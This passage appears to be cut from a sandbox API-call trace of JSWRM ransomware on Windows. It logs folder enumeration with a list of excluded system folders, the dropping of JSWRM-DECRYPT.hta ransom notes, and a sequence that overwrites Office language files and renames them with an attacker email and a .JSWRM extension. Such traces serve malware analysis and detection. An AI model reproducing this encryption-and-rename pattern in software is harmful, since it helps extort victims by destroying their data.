lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21656) returned 1 [0136.819] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.819] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5490, lpOverlapped=0x0) returned 1 [0136.821] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.821] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5490, lpOverlapped=0x0) returned 1 [0136.822] CloseHandle (hObject=0x314) returned 1 [0136.822] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt-BR\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt-br\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt-BR\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt-br\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.823] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.823] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0136.823] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4903b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ro", cAlternateFileName="")) returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2=".") returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="..") returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="...") returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="windows") returned -1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="recovery") returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="perflogs") returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="documents and settings") returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="$RECYCLE.BIN") returned 1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="system volume information") returned -1 [0136.823] lstrcmpiW (lpString1="ro", lpString2="msocache") returned 1 [0136.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ro\\jswrm-decrypt.hta")) returned 0xffffffff [0136.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ro\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.824] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.824] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.825] CloseHandle (hObject=0x238) returned 1 [0136.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ro\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ro\\jswrm-decrypt.hta")) returned 0x20 [0136.825] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ro\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4836e9e9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0136.825] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.826] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4836e9e9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.826] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.826] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.826] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4836e9e9, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4836e9e9, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4836e9e9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.826] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.826] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.826] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ro\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ro\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.827] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22168) returned 1 [0136.827] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.828] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5690, lpOverlapped=0x0) returned 1 [0136.830] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.830] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5690, lpOverlapped=0x0) returned 1 [0136.831] CloseHandle (hObject=0x314) returned 1 [0136.831] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ro\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ro\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ro\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ro\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.838] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x54ef2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.838] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0136.838] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ru", cAlternateFileName="")) returned 1 [0136.838] lstrcmpiW (lpString1="ru", lpString2=".") returned 1 [0136.838] lstrcmpiW (lpString1="ru", lpString2="..") returned 1 [0136.838] lstrcmpiW (lpString1="ru", lpString2="...") returned 1 [0136.838] lstrcmpiW (lpString1="ru", lpString2="windows") returned -1 [0136.838] lstrcmpiW (lpString1="ru", lpString2="recovery") returned 1 [0136.839] lstrcmpiW (lpString1="ru", lpString2="perflogs") returned 1 [0136.839] lstrcmpiW (lpString1="ru", lpString2="documents and settings") returned 1 [0136.839] lstrcmpiW (lpString1="ru", lpString2="$RECYCLE.BIN") returned 1 [0136.839] lstrcmpiW (lpString1="ru", lpString2="system volume information") returned -1 [0136.839] lstrcmpiW (lpString1="ru", lpString2="msocache") returned 1 [0136.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ru\\jswrm-decrypt.hta")) returned 0xffffffff [0136.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ru\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.841] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.841] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.842] CloseHandle (hObject=0x238) returned 1 [0136.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ru\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ru\\jswrm-decrypt.hta")) returned 0x20 [0136.843] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ru\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48394ff3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232140 [0136.843] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.843] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48394ff3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.843] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.843] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.843] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48394ff3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48394ff3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48394ff3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.843] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.843] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.843] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.843] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.843] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.844] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.844] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.844] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.844] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.844] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.844] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.844] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ru\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ru\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.845] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22680) returned 1 [0136.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.845] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5890, lpOverlapped=0x0) returned 1 [0136.848] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.848] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, 